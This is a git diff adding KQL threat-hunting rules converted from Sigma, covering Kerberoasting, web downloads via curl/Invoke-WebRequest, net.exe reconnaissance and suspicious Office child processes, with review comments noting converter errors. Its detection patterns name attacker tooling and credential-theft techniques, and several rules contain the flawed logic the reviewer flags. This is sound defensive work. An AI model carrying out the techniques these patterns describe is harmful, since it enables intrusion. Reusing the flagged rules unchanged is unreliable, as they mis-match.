diff --git a/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql
new file mode 100644
index 00000000..4731076f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Greedy Compression Using Rar.EXE
+// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-12-15
+// Level: high
+// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
new file mode 100644
index 00000000..b3be07ec
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
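Review bot: Two terms in this rule's `where` line look like converter artifacts rather than intended logic. `ProcessCommandLine contains ":\*."` keeps a single backslash where every other path fragment in the same predicate doubles it (`":\\$Recycle.bin\\"`, `":\\PerfLogs\\"`), so the literal is unlikely to be accepted as an escape by the Kusto parser and in any case will not match the `:\*.` text the neighbouring `":*."` term suggests; it presumably should be `":\\*."`, to be confirmed against the Sigma source. Separately, each staging-folder alternative is paired with `ProcessCommandLine contains " "`, which holds for practically any command line with arguments; this shape usually results from splitting a Sigma value that contains an unescaped `*` into fragments, which drops the ordering the wildcard expressed. Worth checking how helper.py expands embedded wildcards, since the same expansion would affect other rules in the same way.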
@@ -0,0 +1,14 @@
+// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
+// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
+// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
+// False Positives:
+// - Inventory tool runs
+// - Administrative activity
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql b/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql
new file mode 100644
index 00000000..3c376b19
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious GrpConv Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-19
+// Level: high
+// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_gup_usage.kql b/KQL/rules/windows/process_creation/suspicious_gup_usage.kql
new file mode 100644
index 00000000..7b2d6fd6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_gup_usage.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious GUP Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-06
+// Level: high
+// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Execution of tools named GUP.exe and located in folders different than Notepad++\updater
+
+DeviceProcessEvents
+| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql b/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql
new file mode 100644
index 00000000..3f6ef8ad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious HH.EXE Execution
+// Author: Maxim Pavlunin
+// Date: 2020-04-01
+// Level: high
+// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql
new file mode 100644
index 00000000..3ba59dad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious High IntegrityLevel Conhost Legacy Option
+// Author: frack113
+// Date: 2022-12-09
+// Level: informational
+// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Very Likely, including launching cmd.exe via Run As Administrator
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql b/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql
new file mode 100644
index 00000000..ff5f4e12
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious HWP Sub Processes
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
+
+DeviceProcessEvents
+| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql b/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql
new file mode 100644
index 00000000..b07ae179
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious IIS Module Registration
+// Author: Florian Roth (Nextron Systems), Microsoft (idea)
+// Date: 2022-08-04
+// Level: high
+// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.004
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
new file mode 100644
index 00000000..279b5fc7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of appcmd to add new URL rewrite rules
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql
new file mode 100644
index 00000000..6fb90d3f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Invoke-WebRequest Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" or ProcessCommandLine contains " -o") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains ":\\Windows\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql
new file mode 100644
index 00000000..b41eb155
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Invoke-WebRequest Execution With DirectIP
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-21
+// Level: medium
+// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql
new file mode 100644
index 00000000..c61b1951
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious JavaScript Execution Via Mshta.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects execution of javascript code using "mshta.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql
new file mode 100644
index 00000000..01f2f7e1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Kerberos Ticket Request via CLI
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-18
+// Level: high
+// Description: Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class.
+// Threat actors may use command line interfaces to request Kerberos tickets for service accounts in order to
+// perform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse
+// techniques like silver ticket attacks.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Legitimate command line usage by administrators or security tools.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "System.IdentityModel.Tokens.KerberosRequestorSecurityToken" and ProcessCommandLine contains ".GetRequest()") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql
new file mode 100644
index 00000000..d6357ace
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Kernel Dump Using Dtrace
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-28
+// Level: high
+// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql b/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql
new file mode 100644
index 00000000..d9bf2d8d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Key Manager Access
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-21
+// Level: high
+// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
new file mode 100644
index 00000000..d7d713a9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious LNK Command-Line Padding with Whitespace Characters
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-03-19
+// Level: high
+// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).
+// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.
+// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.
+// This rule flags suspicious use of such padding observed in real-world attacks.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1204.002
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " " or ProcessCommandLine contains "\\u0009" or ProcessCommandLine contains "\\u000A" or ProcessCommandLine contains "\\u0011" or ProcessCommandLine contains "\\u0012" or ProcessCommandLine contains "\\u0013" or ProcessCommandLine contains "\\u000B" or ProcessCommandLine contains "\\u000C" or ProcessCommandLine contains "\\u000D") or ProcessCommandLine matches regex "\\n\\n\\n\\n\\n\\n") and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessCommandLine contains ".lnk")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql
new file mode 100644
index 00000000..000c2506
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql
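Review bot: The `contains "\\u0009"` through `contains "\\u000D"` terms in this rule's `where` line match the six-character literal text `\u0009` and so on, not the control characters the description talks about, because `\\` in a KQL double-quoted literal is an escaped backslash; only the `matches regex "\\n\\n\\n\\n\\n\\n"` branch is interpreted as real newlines, by the regex engine. Unless the intent really is to catch the literal escape text, those terms need the characters themselves (KQL literals accept `\t` and `\n` directly; the rest are easiest to express in the regex branch with `\\x0B`-style escapes) or the whole whitespace group could become one regex. As rendered here the first alternative is `ProcessCommandLine contains " "` with a single space, which holds for almost every command line; if the Sigma source carries a long run of spaces that the converter or the page view collapsed, that needs confirming as well. Also note that `\u0011`–`\u0013` are not whitespace while the header cites 0x09–0x0D, which is probably inherited from the source but worth checking against it.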
@@ -0,0 +1,12 @@ +// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium + +DeviceProcessEvents +| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " 
or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql new file mode 100644 index 00000000..168bfa13 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql 
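Review bot: The header's `// MITRE Tactic: Collection` and `// Tags: attack.collection, attack.t1560.001` do not describe this rule: the `| where` line detects `net user` changes to built-in accounts (Administrator, guest, DefaultAccount and their localized names), which is account manipulation, not archive-via-utility (T1560.001). It looks like the tag block was carried over from another rule during conversion; the upstream Sigma rule's tags (the T1098 account-manipulation family, if that is what upstream carries) should be verified and the two header lines regenerated, since analysts triage on these tags. The detection logic itself reads correctly, including the `not(guest and /active no)` exclusion for routine disabling of the guest account.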
@@ -0,0 +1,10 @@ +// Title: Suspicious Microsoft Office Child Process +// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +// Date: 2018-04-06 +// Level: high +// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith 
"\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql new file mode 100644 index 00000000..558923be --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Microsoft OneNote Child Process +// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) +// Date: 2022-10-21 +// Level: high +// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. +// MITRE Tactic: Initial Access +// Tags: attack.t1566, attack.t1566.001, attack.initial-access +// False Positives: +// - File located in the AppData folder with trusted signature + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith 
